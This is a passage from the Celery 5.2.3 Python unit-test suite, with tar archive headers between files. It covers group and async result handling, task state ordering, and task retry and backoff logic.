test_get_nested_without_native_join(self): backend = SimpleBackend() backend.supports_native_join = False ts = self.app.GroupResult(uuid(), [ MockAsyncResultSuccess(uuid(), result='1.1', app=self.app, backend=backend), self.app.GroupResult(uuid(), [ MockAsyncResultSuccess(uuid(), result='2.1', app=self.app, backend=backend), self.app.GroupResult(uuid(), [ MockAsyncResultSuccess(uuid(), result='3.1', app=self.app, backend=backend), MockAsyncResultSuccess(uuid(), result='3.2', app=self.app, backend=backend), ]), ]), ]) with patch('celery.Celery.backend', new=backend): vals = ts.get() assert vals == [ '1.1', [ '2.1', [ '3.1', '3.2', ] ], ] def test_getitem(self): subs = [MockAsyncResultSuccess(uuid(), app=self.app), MockAsyncResultSuccess(uuid(), app=self.app)] ts = self.app.GroupResult(uuid(), subs) assert ts[0] is subs[0] def test_save_restore(self): subs = [MockAsyncResultSuccess(uuid(), app=self.app), MockAsyncResultSuccess(uuid(), app=self.app)] ts = self.app.GroupResult(uuid(), subs) ts.save() with pytest.raises(AttributeError): ts.save(backend=object()) assert self.app.GroupResult.restore(ts.id).results == ts.results ts.delete() assert self.app.GroupResult.restore(ts.id) is None with pytest.raises(AttributeError): self.app.GroupResult.restore(ts.id, backend=object()) def test_save_restore_empty(self): subs = [] ts = self.app.GroupResult(uuid(), subs) ts.save() assert isinstance( self.app.GroupResult.restore(ts.id), self.app.GroupResult, ) assert self.app.GroupResult.restore(ts.id).results == ts.results == [] def test_restore_app(self): subs = [MockAsyncResultSuccess(uuid(), app=self.app)] ts = self.app.GroupResult(uuid(), subs) ts.save() restored = GroupResult.restore(ts.id, app=self.app) assert restored.id == ts.id def test_restore_current_app_fallback(self): subs = [MockAsyncResultSuccess(uuid(), app=self.app)] ts = self.app.GroupResult(uuid(), subs) ts.save() with pytest.raises(RuntimeError, match="Test depends on current_app"): GroupResult.restore(ts.id) def test_join_native(self): backend = SimpleBackend() results = [self.app.AsyncResult(uuid(), backend=backend) for i in range(10)] ts = self.app.GroupResult(uuid(), results) with patch('celery.Celery.backend', new=backend): backend.ids = [result.id for result in results] res = ts.join_native() assert res == list(range(10)) callback = Mock(name='callback') assert not ts.join_native(callback=callback) callback.assert_has_calls([ call(r.id, i) for i, r in enumerate(ts.results) ]) def test_join_native_raises(self): ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())]) ts.iter_native = Mock() ts.iter_native.return_value = iter([ (uuid(), {'status': states.FAILURE, 'result': KeyError()}) ]) with pytest.raises(KeyError): ts.join_native(propagate=True) def test_failed_join_report(self): res = Mock() ts = self.app.GroupResult(uuid(), [res]) res.state = states.FAILURE res.backend.is_cached.return_value = True assert next(ts._failed_join_report()) is res res.backend.is_cached.return_value = False with pytest.raises(StopIteration): next(ts._failed_join_report()) def test_repr(self): assert repr( self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])) def test_children_is_results(self): ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())]) assert ts.children is ts.results def test_iter_native(self): backend = SimpleBackend() results = [self.app.AsyncResult(uuid(), backend=backend) for i in range(10)] ts = self.app.GroupResult(uuid(), results) with patch('celery.Celery.backend', new=backend): backend.ids = [result.id for result in results] assert len(list(ts.iter_native())) == 10 def test_join_timeout(self): ar = MockAsyncResultSuccess(uuid(), app=self.app) ar2 = MockAsyncResultSuccess(uuid(), app=self.app) ar3 = self.app.AsyncResult(uuid()) ts = self.app.GroupResult(uuid(), [ar, ar2, ar3]) with pytest.raises(TimeoutError): ts.join(timeout=0.0000001) ar4 = self.app.AsyncResult(uuid()) ar4.get = Mock() ts2 = self.app.GroupResult(uuid(), [ar4]) assert ts2.join(timeout=0.1) callback = Mock(name='callback') assert not ts2.join(timeout=0.1, callback=callback) callback.assert_called_with(ar4.id, ar4.get()) def test_iter_native_when_empty_group(self): ts = self.app.GroupResult(uuid(), []) assert list(ts.iter_native()) == [] def test___iter__(self): assert list(iter(self.ts)) == self.ts.results def test_join(self): joined = self.ts.join() assert joined == list(range(self.size)) def test_successful(self): assert self.ts.successful() def test_failed(self): assert not self.ts.failed() def test_maybe_throw(self): self.ts.results = [Mock(name='r1')] self.ts.maybe_throw() self.ts.results[0].maybe_throw.assert_called_with( callback=None, propagate=True, ) def test_join__on_message(self): with pytest.raises(ImproperlyConfigured): self.ts.join(on_message=Mock()) def test_waiting(self): assert not self.ts.waiting() def test_ready(self): assert self.ts.ready() def test_completed_count(self): assert self.ts.completed_count() == len(self.ts) class test_pending_AsyncResult: def test_result(self, app): res = app.AsyncResult(uuid()) assert res.result is None class test_failed_AsyncResult: def setup(self): self.size = 11 self.app.conf.result_serializer = 'pickle' results = make_mock_group(self.app, 10) failed = mock_task('ts11', states.FAILURE, KeyError('Baz')) save_result(self.app, failed) failed_res = self.app.AsyncResult(failed['id']) self.ts = self.app.GroupResult(uuid(), results + [failed_res]) def test_completed_count(self): assert self.ts.completed_count() == len(self.ts) - 1 def test_join(self): with pytest.raises(KeyError): self.ts.join() def test_successful(self): assert not self.ts.successful() def test_failed(self): assert self.ts.failed() class test_pending_Group: def setup(self): self.ts = self.app.GroupResult( uuid(), [self.app.AsyncResult(uuid()), self.app.AsyncResult(uuid())]) def test_completed_count(self): assert self.ts.completed_count() == 0 def test_ready(self): assert not self.ts.ready() def test_waiting(self): assert self.ts.waiting() def test_join(self): with pytest.raises(TimeoutError): self.ts.join(timeout=0.001) def test_join_longer(self): with pytest.raises(TimeoutError): self.ts.join(timeout=1) class test_EagerResult: def setup(self): @self.app.task(shared=False) def raising(x, y): raise KeyError(x, y) self.raising = raising def test_wait_raises(self): res = self.raising.apply(args=[3, 3]) with pytest.raises(KeyError): res.wait() assert res.wait(propagate=False) def test_wait(self): res = EagerResult('x', 'x', states.RETRY) res.wait() assert res.state == states.RETRY assert res.status == states.RETRY def test_forget(self): res = EagerResult('x', 'x', states.RETRY) res.forget() def test_revoke(self): res = self.raising.apply(args=[3, 3]) assert not res.revoke() @patch('celery.result.task_join_will_block') def test_get_sync_subtask_option(self, task_join_will_block): task_join_will_block.return_value = True tid = uuid() res_subtask_async = EagerResult(tid, 'x', 'x', states.SUCCESS) with pytest.raises(RuntimeError): res_subtask_async.get() res_subtask_async.get(disable_sync_subtasks=False) class test_tuples: def test_AsyncResult(self): x = self.app.AsyncResult(uuid()) assert x, result_from_tuple(x.as_tuple() == self.app) assert x, result_from_tuple(x == self.app) def test_with_parent(self): x = self.app.AsyncResult(uuid()) x.parent = self.app.AsyncResult(uuid()) y = result_from_tuple(x.as_tuple(), self.app) assert y == x assert y.parent == x.parent assert isinstance(y.parent, AsyncResult) def test_compat(self): uid = uuid() x = result_from_tuple([uid, []], app=self.app) assert x.id == uid def test_as_list(self): uid = uuid() x = self.app.AsyncResult(uid) assert x.id == x.as_list()[0] assert isinstance(x.as_list(), list) def test_GroupResult(self): x = self.app.GroupResult( uuid(), [self.app.AsyncResult(uuid()) for _ in range(10)], ) assert x, result_from_tuple(x.as_tuple() == self.app) assert x, result_from_tuple(x == self.app) def test_GroupResult_with_parent(self): parent = self.app.AsyncResult(uuid()) result = self.app.GroupResult( uuid(), [self.app.AsyncResult(uuid()) for _ in range(10)], parent ) second_result = result_from_tuple(result.as_tuple(), self.app) assert second_result == result assert second_result.parent == parent def test_GroupResult_as_tuple(self): parent = self.app.AsyncResult(uuid()) result = self.app.GroupResult( 'group-result-1', [self.app.AsyncResult(f'async-result-{i}') for i in range(2)], parent ) (result_id, parent_tuple), group_results = result.as_tuple() assert result_id == result.id assert parent_tuple == parent.as_tuple() assert parent_tuple[0][0] == parent.id assert isinstance(group_results, list) expected_grp_res = [((f'async-result-{i}', None), None) for i in range(2)] assert group_results == expected_grp_res ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/tasks/test_states.py0000664000175000017500000000207500000000000020164 0ustar00asifasif00000000000000import pytest from celery import states class test_state_precedence: @pytest.mark.parametrize('r,l', [ (states.SUCCESS, states.PENDING), (states.FAILURE, states.RECEIVED), (states.REVOKED, states.STARTED), (states.SUCCESS, 'CRASHED'), (states.FAILURE, 'CRASHED'), ]) def test_gt(self, r, l): assert states.state(r) > states.state(l) @pytest.mark.parametrize('r,l', [ ('CRASHED', states.REVOKED), ]) def test_gte(self, r, l): assert states.state(r) >= states.state(l) @pytest.mark.parametrize('r,l', [ (states.PENDING, states.SUCCESS), (states.RECEIVED, states.FAILURE), (states.STARTED, states.REVOKED), ('CRASHED', states.SUCCESS), ('CRASHED', states.FAILURE), (states.REVOKED, 'CRASHED'), ]) def test_lt(self, r, l): assert states.state(r) < states.state(l) @pytest.mark.parametrize('r,l', [ (states.REVOKED, 'CRASHED'), ]) def test_lte(self, r, l): assert states.state(r) <= states.state(l) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/tasks/test_tasks.py0000664000175000017500000015073300000000000020013 0ustar00asifasif00000000000000import socket import tempfile from datetime import datetime, timedelta from unittest.mock import ANY, MagicMock, Mock, patch, sentinel import pytest from kombu import Queue from kombu.exceptions import EncodeError from celery import Task, group, uuid from celery.app.task import _reprtask from celery.contrib.testing.mocks import ContextMock from celery.exceptions import Ignore, ImproperlyConfigured, Retry from celery.result import AsyncResult, EagerResult from celery.utils.time import parse_iso8601 try: from urllib.error import HTTPError except ImportError: # pragma: no cover from urllib2 import HTTPError def return_True(*args, **kwargs): # Task run functions can't be closures/lambdas, as they're pickled. return True class MockApplyTask(Task): abstract = True applied = 0 def run(self, x, y): return x * y def apply_async(self, *args, **kwargs): self.applied += 1 class TaskWithPriority(Task): priority = 10 class TaskWithRetry(Task): autoretry_for = (TypeError,) retry_kwargs = {'max_retries': 5} retry_backoff = True retry_backoff_max = 700 retry_jitter = False class TasksCase: def setup(self): self.mytask = self.app.task(shared=False)(return_True) @self.app.task(bind=True, count=0, shared=False) def increment_counter(self, increment_by=1): self.count += increment_by or 1 return self.count self.increment_counter = increment_counter @self.app.task(shared=False) def raising(): raise KeyError('foo') self.raising = raising @self.app.task(bind=True, max_retries=3, iterations=0, shared=False) def retry_task(self, arg1, arg2, kwarg=1, max_retries=None, care=True): self.iterations += 1 rmax = self.max_retries if max_retries is None else max_retries assert repr(self.request) retries = self.request.retries if care and retries >= rmax: return arg1 else: raise self.retry(countdown=0, max_retries=rmax) self.retry_task = retry_task @self.app.task(bind=True, max_retries=3, iterations=0, shared=False) def retry_task_noargs(self, **kwargs): self.iterations += 1 if self.request.retries >= 3: return 42 else: raise self.retry(countdown=0) self.retry_task_noargs = retry_task_noargs @self.app.task(bind=True, max_retries=3, iterations=0, shared=False) def retry_task_return_without_throw(self, **kwargs): self.iterations += 1 try: if self.request.retries >= 3: return 42 else: raise Exception("random code exception") except Exception as exc: return self.retry(exc=exc, throw=False) self.retry_task_return_without_throw = retry_task_return_without_throw @self.app.task(bind=True, max_retries=3, iterations=0, shared=False) def retry_task_return_with_throw(self, **kwargs): self.iterations += 1 try: if self.request.retries >= 3: return 42 else: raise Exception("random code exception") except Exception as exc: return self.retry(exc=exc, throw=True) self.retry_task_return_with_throw = retry_task_return_with_throw @self.app.task(bind=True, max_retries=3, iterations=0, shared=False, autoretry_for=(Exception,)) def retry_task_auto_retry_with_single_new_arg(self, ret=None, **kwargs): if ret is None: return self.retry(exc=Exception("I have filled now"), args=["test"], kwargs=kwargs) else: return ret self.retry_task_auto_retry_with_single_new_arg = retry_task_auto_retry_with_single_new_arg @self.app.task(bind=True, max_retries=3, iterations=0, shared=False) def retry_task_auto_retry_with_new_args(self, ret=None, place_holder=None, **kwargs): if ret is None: return self.retry(args=[place_holder, place_holder], kwargs=kwargs) else: return ret self.retry_task_auto_retry_with_new_args = retry_task_auto_retry_with_new_args @self.app.task(bind=True, max_retries=3, iterations=0, shared=False, autoretry_for=(Exception,)) def retry_task_auto_retry_exception_with_new_args(self, ret=None, place_holder=None, **kwargs): if ret is None: return self.retry(exc=Exception("I have filled"), args=[place_holder, place_holder], kwargs=kwargs) else: return ret self.retry_task_auto_retry_exception_with_new_args = retry_task_auto_retry_exception_with_new_args @self.app.task(bind=True, max_retries=10, iterations=0, shared=False, autoretry_for=(Exception,)) def retry_task_max_retries_override(self, **kwargs): # Test for #6436 self.iterations += 1 if self.iterations == 3: # I wanna force fail here cause i have enough self.retry(exc=MyCustomException, max_retries=0) self.retry(exc=MyCustomException) self.retry_task_max_retries_override = retry_task_max_retries_override @self.app.task(bind=True, max_retries=0, iterations=0, shared=False, autoretry_for=(Exception,)) def retry_task_explicit_exception(self, **kwargs): # Test for #6436 self.iterations += 1 raise MyCustomException() self.retry_task_explicit_exception = retry_task_explicit_exception @self.app.task(bind=True, max_retries=3, iterations=0, shared=False) def retry_task_raise_without_throw(self, **kwargs): self.iterations += 1 try: if self.request.retries >= 3: return 42 else: raise Exception("random code exception") except Exception as exc: raise self.retry(exc=exc, throw=False) self.retry_task_raise_without_throw = retry_task_raise_without_throw @self.app.task(bind=True, max_retries=3, iterations=0, base=MockApplyTask, shared=False) def retry_task_mockapply(self, arg1, arg2, kwarg=1): self.iterations += 1 retries = self.request.retries if retries >= 3: return arg1 raise self.retry(countdown=0) self.retry_task_mockapply = retry_task_mockapply @self.app.task(bind=True, max_retries=3, iterations=0, shared=False) def retry_task_customexc(self, arg1, arg2, kwarg=1, **kwargs): self.iterations += 1 retries = self.request.retries if retries >= 3: return arg1 + kwarg else: try: raise MyCustomException('Elaine Marie Benes') except MyCustomException as exc: kwargs.update(kwarg=kwarg) raise self.retry(countdown=0, exc=exc) self.retry_task_customexc = retry_task_customexc @self.app.task(bind=True, autoretry_for=(ZeroDivisionError,), shared=False) def autoretry_task_no_kwargs(self, a, b): self.iterations += 1 return a / b self.autoretry_task_no_kwargs = autoretry_task_no_kwargs @self.app.task(bind=True, autoretry_for=(ZeroDivisionError,), retry_kwargs={'max_retries': 5}, shared=False) def autoretry_task(self, a, b): self.iterations += 1 return a / b self.autoretry_task = autoretry_task @self.app.task(bind=True, autoretry_for=(HTTPError,), retry_backoff=True, shared=False) def autoretry_backoff_task(self, url): self.iterations += 1 if "error" in url: fp = tempfile.TemporaryFile() raise HTTPError(url, '500', 'Error', '', fp) return url self.autoretry_backoff_task = autoretry_backoff_task @self.app.task(bind=True, autoretry_for=(HTTPError,), retry_backoff=True, retry_jitter=True, shared=False) def autoretry_backoff_jitter_task(self, url): self.iterations += 1 if "error" in url: fp = tempfile.TemporaryFile() raise HTTPError(url, '500', 'Error', '', fp) return url self.autoretry_backoff_jitter_task = autoretry_backoff_jitter_task @self.app.task(bind=True, base=TaskWithRetry, shared=False) def autoretry_for_from_base_task(self, a, b): self.iterations += 1 return a + b self.autoretry_for_from_base_task = autoretry_for_from_base_task @self.app.task(bind=True, base=TaskWithRetry, autoretry_for=(ZeroDivisionError,), shared=False) def override_autoretry_for_from_base_task(self, a, b): self.iterations += 1 return a / b self.override_autoretry_for = override_autoretry_for_from_base_task @self.app.task(bind=True, base=TaskWithRetry, shared=False) def retry_kwargs_from_base_task(self, a, b): self.iterations += 1 return a + b self.retry_kwargs_from_base_task = retry_kwargs_from_base_task @self.app.task(bind=True, base=TaskWithRetry, retry_kwargs={'max_retries': 2}, shared=False) def override_retry_kwargs_from_base_task(self, a, b): self.iterations += 1 return a + b self.override_retry_kwargs = override_retry_kwargs_from_base_task @self.app.task(bind=True, base=TaskWithRetry, shared=False) def retry_backoff_from_base_task(self, a, b): self.iterations += 1 return a + b self.retry_backoff_from_base_task = retry_backoff_from_base_task @self.app.task(bind=True, base=TaskWithRetry, retry_backoff=False, shared=False) def override_retry_backoff_from_base_task(self, a, b): self.iterations += 1 return a + b self.override_retry_backoff = override_retry_backoff_from_base_task @self.app.task(bind=True, base=TaskWithRetry, shared=False) def retry_backoff_max_from_base_task(self, a, b): self.iterations += 1 return a + b self.retry_backoff_max_from_base_task = retry_backoff_max_from_base_task @self.app.task(bind=True, base=TaskWithRetry, retry_backoff_max=16, shared=False) def override_retry_backoff_max_from_base_task(self, a, b): self.iterations += 1 return a + b self.override_backoff_max = override_retry_backoff_max_from_base_task @self.app.task(bind=True, base=TaskWithRetry, shared=False) def retry_backoff_jitter_from_base_task(self, a, b): self.iterations += 1 return a + b self.retry_backoff_jitter_from_base = retry_backoff_jitter_from_base_task @self.app.task(bind=True, base=TaskWithRetry, retry_jitter=True, shared=False) def override_backoff_jitter_from_base_task(self, a, b): self.iterations += 1 return a + b self.override_backoff_jitter = override_backoff_jitter_from_base_task @self.app.task(bind=True) def task_check_request_context(self): assert self.request.hostname == socket.gethostname() self.task_check_request_context = task_check_request_context @self.app.task(ignore_result=True) def task_with_ignored_result(): pass self.task_with_ignored_result = task_with_ignored_result @self.app.task(bind=True) def task_called_by_other_task(self): pass @self.app.task(bind=True) def task_which_calls_other_task(self): # Couldn't find a better way to mimic an apply_async() # request with set priority self.request.delivery_info['priority'] = 5 task_called_by_other_task.delay() self.task_which_calls_other_task = task_which_calls_other_task @self.app.task(bind=True) def task_replacing_another_task(self): return "replaced" self.task_replacing_another_task = task_replacing_another_task @self.app.task(bind=True) def task_replaced_by_other_task(self): return self.replace(task_replacing_another_task.si()) @self.app.task(bind=True, autoretry_for=(Exception,)) def task_replaced_by_other_task_with_autoretry(self): return self.replace(task_replacing_another_task.si()) self.task_replaced_by_other_task = task_replaced_by_other_task self.task_replaced_by_other_task_with_autoretry = task_replaced_by_other_task_with_autoretry # Remove all messages from memory-transport from kombu.transport.memory import Channel Channel.queues.clear() class MyCustomException(Exception): """Random custom exception.""" class test_task_retries(TasksCase): def test_retry(self): self.retry_task.max_retries = 3 self.retry_task.iterations = 0 self.retry_task.apply([0xFF, 0xFFFF]) assert self.retry_task.iterations == 4 self.retry_task.max_retries = 3 self.retry_task.iterations = 0 self.retry_task.apply([0xFF, 0xFFFF], {'max_retries': 10}) assert self.retry_task.iterations == 11 def test_retry_priority(self): priority = 7 # Technically, task.priority doesn't need to be set here # since push_request() doesn't populate the delivery_info # with it. However, setting task.priority here also doesn't # cause any problems. self.retry_task.priority = priority self.retry_task.push_request() self.retry_task.request.delivery_info = { 'priority': priority } sig = self.retry_task.signature_from_request() assert sig.options['priority'] == priority def test_retry_no_args(self): self.retry_task_noargs.max_retries = 3 self.retry_task_noargs.iterations = 0 self.retry_task_noargs.apply(propagate=True).get() assert self.retry_task_noargs.iterations == 4 def test_signature_from_request__passes_headers(self): self.retry_task.push_request() self.retry_task.request.headers = {'custom': 10.1} sig = self.retry_task.signature_from_request() assert sig.options['headers']['custom'] == 10.1 def test_signature_from_request__delivery_info(self): self.retry_task.push_request() self.retry_task.request.delivery_info = { 'exchange': 'testex', 'routing_key': 'testrk', } sig = self.retry_task.signature_from_request() assert sig.options['exchange'] == 'testex' assert sig.options['routing_key'] == 'testrk' def test_signature_from_request__shadow_name(self): self.retry_task.push_request() self.retry_task.request.shadow = 'test' sig = self.retry_task.signature_from_request() assert sig.options['shadow'] == 'test' def test_retry_kwargs_can_be_empty(self): self.retry_task_mockapply.push_request() try: with pytest.raises(Retry): import sys try: sys.exc_clear() except AttributeError: pass self.retry_task_mockapply.retry(args=[4, 4], kwargs=None) finally: self.retry_task_mockapply.pop_request() def test_retry_without_throw_eager(self): assert self.retry_task_return_without_throw.apply().get() == 42 def test_raise_without_throw_eager(self): assert self.retry_task_raise_without_throw.apply().get() == 42 def test_return_with_throw_eager(self): assert self.retry_task_return_with_throw.apply().get() == 42 def test_eager_retry_with_single_new_params(self): assert self.retry_task_auto_retry_with_single_new_arg.apply().get() == "test" def test_eager_retry_with_new_params(self): assert self.retry_task_auto_retry_with_new_args.si(place_holder="test").apply().get() == "test" def test_eager_retry_with_autoretry_for_exception(self): assert self.retry_task_auto_retry_exception_with_new_args.si(place_holder="test").apply().get() == "test" def test_retry_task_max_retries_override(self): self.retry_task_max_retries_override.max_retries = 10 self.retry_task_max_retries_override.iterations = 0 result = self.retry_task_max_retries_override.apply() with pytest.raises(MyCustomException): result.get() assert self.retry_task_max_retries_override.iterations == 3 def test_retry_task_explicit_exception(self): self.retry_task_explicit_exception.max_retries = 0 self.retry_task_explicit_exception.iterations = 0 result = self.retry_task_explicit_exception.apply() with pytest.raises(MyCustomException): result.get() assert self.retry_task_explicit_exception.iterations == 1 def test_retry_eager_should_return_value(self): self.retry_task.max_retries = 3 self.retry_task.iterations = 0 assert self.retry_task.apply([0xFF, 0xFFFF]).get() == 0xFF assert self.retry_task.iterations == 4 def test_retry_not_eager(self): self.retry_task_mockapply.push_request() try: self.retry_task_mockapply.request.called_directly = False exc = Exception('baz') try: self.retry_task_mockapply.retry( args=[4, 4], kwargs={'task_retries': 0}, exc=exc, throw=False, ) assert self.retry_task_mockapply.applied finally: self.retry_task_mockapply.applied = 0 try: with pytest.raises(Retry): self.retry_task_mockapply.retry( args=[4, 4], kwargs={'task_retries': 0}, exc=exc, throw=True) assert self.retry_task_mockapply.applied finally: self.retry_task_mockapply.applied = 0 finally: self.retry_task_mockapply.pop_request() def test_retry_with_kwargs(self): self.retry_task_customexc.max_retries = 3 self.retry_task_customexc.iterations = 0 self.retry_task_customexc.apply([0xFF, 0xFFFF], {'kwarg': 0xF}) assert self.retry_task_customexc.iterations == 4 def test_retry_with_custom_exception(self): self.retry_task_customexc.max_retries = 2 self.retry_task_customexc.iterations = 0 result = self.retry_task_customexc.apply( [0xFF, 0xFFFF], {'kwarg': 0xF}, ) with pytest.raises(MyCustomException): result.get() assert self.retry_task_customexc.iterations == 3 def test_max_retries_exceeded(self): self.retry_task.max_retries = 2 self.retry_task.iterations = 0 result = self.retry_task.apply([0xFF, 0xFFFF], {'care': False}) with pytest.raises(self.retry_task.MaxRetriesExceededError): result.get() assert self.retry_task.iterations == 3 self.retry_task.max_retries = 1 self.retry_task.iterations = 0 result = self.retry_task.apply([0xFF, 0xFFFF], {'care': False}) with pytest.raises(self.retry_task.MaxRetriesExceededError): result.get() assert self.retry_task.iterations == 2 def test_max_retries_exceeded_task_args(self): self.retry_task.max_retries = 2 self.retry_task.iterations = 0 args = (0xFF, 0xFFFF) kwargs = {'care': False} result = self.retry_task.apply(args, kwargs) with pytest.raises(self.retry_task.MaxRetriesExceededError) as e: result.get() assert e.value.task_args == args assert e.value.task_kwargs == kwargs def test_autoretry_no_kwargs(self): self.autoretry_task_no_kwargs.max_retries = 3 self.autoretry_task_no_kwargs.iterations = 0 self.autoretry_task_no_kwargs.apply((1, 0)) assert self.autoretry_task_no_kwargs.iterations == 4 def test_autoretry(self): self.autoretry_task.max_retries = 3 self.autoretry_task.iterations = 0 self.autoretry_task.apply((1, 0)) assert self.autoretry_task.iterations == 6 @patch('random.randrange', side_effect=lambda i: i - 1) def test_autoretry_backoff(self, randrange): task = self.autoretry_backoff_task task.max_retries = 3 task.iterations = 0 with patch.object(task, 'retry', wraps=task.retry) as fake_retry: task.apply(("http://httpbin.org/error",)) assert task.iterations == 4 retry_call_countdowns = [ call_[1]['countdown'] for call_ in fake_retry.call_args_list ] assert retry_call_countdowns == [1, 2, 4, 8] @patch('random.randrange', side_effect=lambda i: i - 2) def test_autoretry_backoff_jitter(self, randrange): task = self.autoretry_backoff_jitter_task task.max_retries = 3 task.iterations = 0 with patch.object(task, 'retry', wraps=task.retry) as fake_retry: task.apply(("http://httpbin.org/error",)) assert task.iterations == 4 retry_call_countdowns = [ call_[1]['countdown'] for call_ in fake_retry.call_args_list ] assert retry_call_countdowns == [0, 1, 3, 7] def test_autoretry_for_from_base(self): self.autoretry_for_from_base_task.iterations = 0 self.autoretry_for_from_base_task.apply((1, "a")) assert self.autoretry_for_from_base_task.iterations == 6 def test_override_autoretry_for_from_base(self): self.override_autoretry_for.iterations = 0 self.override_autoretry_for.apply((1, 0)) assert self.override_autoretry_for.iterations == 6 def test_retry_kwargs_from_base(self): self.retry_kwargs_from_base_task.iterations = 0 self.retry_kwargs_from_base_task.apply((1, "a")) assert self.retry_kwargs_from_base_task.iterations == 6 def test_override_retry_kwargs_from_base(self): self.override_retry_kwargs.iterations = 0 self.override_retry_kwargs.apply((1, "a")) assert self.override_retry_kwargs.iterations == 3 def test_retry_backoff_from_base(self): task = self.retry_backoff_from_base_task task.iterations = 0 with patch.object(task, 'retry', wraps=task.retry) as fake_retry: task.apply((1, "a")) assert task.iterations == 6 retry_call_countdowns = [ call_[1]['countdown'] for call_ in fake_retry.call_args_list ] assert retry_call_countdowns == [1, 2, 4, 8, 16, 32] @patch('celery.app.autoretry.get_exponential_backoff_interval') def test_override_retry_backoff_from_base(self, backoff): self.override_retry_backoff.iterations = 0 self.override_retry_backoff.apply((1, "a")) assert self.override_retry_backoff.iterations == 6 assert backoff.call_count == 0 def test_retry_backoff_max_from_base(self): task = self.retry_backoff_max_from_base_task task.iterations = 0 with patch.object(task, 'retry', wraps=task.retry) as fake_retry: task.apply((1, "a")) assert task.iterations == 6 retry_call_countdowns = [ call_[1]['countdown'] for call_ in fake_retry.call_args_list ] assert retry_call_countdowns == [1, 2, 4, 8, 16, 32] def test_override_retry_backoff_max_from_base(self): task = self.override_backoff_max task.iterations = 0 with patch.object(task, 'retry', wraps=task.retry) as fake_retry: task.apply((1, "a")) assert task.iterations == 6 retry_call_countdowns = [ call_[1]['countdown'] for call_ in fake_retry.call_args_list ] assert retry_call_countdowns == [1, 2, 4, 8, 16, 16] def test_retry_backoff_jitter_from_base(self): task = self.retry_backoff_jitter_from_base task.iterations = 0 with patch.object(task, 'retry', wraps=task.retry) as fake_retry: task.apply((1, "a")) assert task.iterations == 6 retry_call_countdowns = [ call_[1]['countdown'] for call_ in fake_retry.call_args_list ] assert retry_call_countdowns == [1, 2, 4, 8, 16, 32] @patch('random.randrange', side_effect=lambda i: i - 2) def test_override_backoff_jitter_from_base(self, randrange): task = self.override_backoff_jitter task.iterations = 0 with patch.object(task, 'retry', wraps=task.retry) as fake_retry: task.apply((1, "a")) assert task.iterations == 6 retry_call_countdowns = [ call_[1]['countdown'] for call_ in fake_retry.call_args_list ] assert retry_call_countdowns == [0, 1, 3, 7, 15, 31] def test_retry_wrong_eta_when_not_enable_utc(self): """Issue #3753""" self.app.conf.enable_utc = False self.app.conf.timezone = 'US/Eastern' self.autoretry_task.iterations = 0 self.autoretry_task.default_retry_delay = 2 self.autoretry_task.apply((1, 0)) assert self.autoretry_task.iterations == 6 def test_autoretry_class_based_task(self): class ClassBasedAutoRetryTask(Task): name = 'ClassBasedAutoRetryTask' autoretry_for = (ZeroDivisionError,) retry_kwargs = {'max_retries': 5} retry_backoff = True retry_backoff_max = 700 retry_jitter = False iterations = 0 _app = self.app def run(self, x, y): self.iterations += 1 return x / y task = ClassBasedAutoRetryTask() self.app.tasks.register(task) task.iterations = 0 task.apply([1, 0]) assert task.iterations == 6 class test_canvas_utils(TasksCase): def test_si(self): assert self.retry_task.si() assert self.retry_task.si().immutable def test_chunks(self): assert self.retry_task.chunks(range(100), 10) def test_map(self): assert self.retry_task.map(range(100)) def test_starmap(self): assert self.retry_task.starmap(range(100)) def test_on_success(self): self.retry_task.on_success(1, 1, (), {}) class test_tasks(TasksCase): def now(self): return self.app.now() def test_typing(self): @self.app.task() def add(x, y, kw=1): pass with pytest.raises(TypeError): add.delay(1) with pytest.raises(TypeError): add.delay(1, kw=2) with pytest.raises(TypeError): add.delay(1, 2, foobar=3) add.delay(2, 2) def test_shadow_name(self): def shadow_name(task, args, kwargs, options): return 'fooxyz' @self.app.task(shadow_name=shadow_name) def shadowed(): pass old_send_task = self.app.send_task self.app.send_task = Mock() shadowed.delay() self.app.send_task.assert_called_once_with(ANY, ANY, ANY, compression=ANY, delivery_mode=ANY, exchange=ANY, expires=ANY, immediate=ANY, link=ANY, link_error=ANY, mandatory=ANY, priority=ANY, producer=ANY, queue=ANY, result_cls=ANY, routing_key=ANY, serializer=ANY, soft_time_limit=ANY, task_id=ANY, task_type=ANY, time_limit=ANY, shadow='fooxyz', ignore_result=False) self.app.send_task = old_send_task def test_inherit_parent_priority_child_task(self): self.app.conf.task_inherit_parent_priority = True self.app.producer_or_acquire = Mock() self.app.producer_or_acquire.attach_mock( ContextMock(serializer='json'), 'return_value') self.app.amqp.send_task_message = Mock(name="send_task_message") self.task_which_calls_other_task.apply(args=[]) self.app.amqp.send_task_message.assert_called_with( ANY, 't.unit.tasks.test_tasks.task_called_by_other_task', ANY, priority=5, queue=ANY, serializer=ANY) def test_typing__disabled(self): @self.app.task(typing=False) def add(x, y, kw=1): pass add.delay(1) add.delay(1, kw=2) add.delay(1, 2, foobar=3) def test_typing__disabled_by_app(self): with self.Celery(set_as_current=False, strict_typing=False) as app: @app.task() def add(x, y, kw=1): pass assert not add.typing add.delay(1) add.delay(1, kw=2) add.delay(1, 2, foobar=3) @pytest.mark.usefixtures('depends_on_current_app') def test_unpickle_task(self): import pickle @self.app.task(shared=True) def xxx(): pass assert pickle.loads(pickle.dumps(xxx)) is xxx.app.tasks[xxx.name] @patch('celery.app.task.current_app') @pytest.mark.usefixtures('depends_on_current_app') def test_bind__no_app(self, current_app): class XTask(Task): _app = None XTask._app = None XTask.__bound__ = False XTask.bind = Mock(name='bind') assert XTask.app is current_app XTask.bind.assert_called_with(current_app) def test_reprtask__no_fmt(self): assert _reprtask(self.mytask) def test_AsyncResult(self): task_id = uuid() result = self.retry_task.AsyncResult(task_id) assert result.backend == self.retry_task.backend assert result.id == task_id def assert_next_task_data_equal(self, consumer, presult, task_name, test_eta=False, test_expires=False, properties=None, headers=None, **kwargs): next_task = consumer.queues[0].get(accept=['pickle', 'json']) task_properties = next_task.properties task_headers = next_task.headers task_body = next_task.decode() task_args, task_kwargs, embed = task_body assert task_headers['id'] == presult.id assert task_headers['task'] == task_name if test_eta: assert isinstance(task_headers.get('eta'), str) to_datetime = 